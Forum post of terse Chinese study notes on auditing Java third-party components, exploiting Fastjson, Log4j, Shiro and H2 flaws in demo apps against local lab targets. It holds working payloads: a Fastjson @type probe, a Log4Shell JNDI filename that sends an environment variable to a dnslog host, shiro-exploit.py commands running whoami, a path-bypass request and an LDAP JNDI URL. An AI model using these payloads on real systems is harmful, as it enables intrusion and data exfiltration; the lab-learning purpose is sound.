ToB企服应用市场:ToB评测及商务社交产业平台

标题: DAY120java审计第三方组件&依赖库挖掘&Fastjson&Shiro&Log4j&H2DB [打印本页]

---

作者: 锦通    时间: 2024-11-17 23:40
标题: DAY120java审计第三方组件&依赖库挖掘&Fastjson&Shiro&Log4j&H2DB
组件漏洞判定插件

一、Tmall_demo-master（fastjson）

1、配置文件查找安装组件

1、JSON.parse(json)
2、JSON.parseObject
2、找可控的变量

3、利用组件漏洞

   poc:propertyJson={"@type":"java.net.Inet4Address","val":"233997ee.log.dnslog.sbs"}
  

二、Tmall_demo-master（Log4j)


logger.error，logger.info函数触发
1、配置文件查找安装组件

session不可控
2、寻找可控变量

originalFileName从file.getOriginalFilename获取文件名

修改文件名利用漏洞

Poc：filename="${jndi:ldap://${env:OS}.7ffb7b28.log.dnslog.sbs}"

3、Jndi

失败

版本不在区间

三、RuoYi-v4.2（shrio版本漏洞）

/docs;/../admin/
1、密钥setCipherKey

python shiro-exploit.py check -u http://127.0.0.1

2、利用链

python shiro-exploit.py echo -g CommonsCollectionsK1 -u http://127.0.0.1 -v 2 -k fCq+/xW488hMTCD+cmJ3aQ== -c whoami

3、shiro漏洞绕过拦截器

4、/css;/../common/download利用漏洞shiro

GET /css;/../common/download HTTP/1.1

四、halo-0.4.3（h2database）

1、环境配置进入后台

2、访问h2database

javax.naming.InitialContext
ldap://192.168.93.1:1389/9nbcm6

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

---

欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/)

Powered by Discuz! X3.4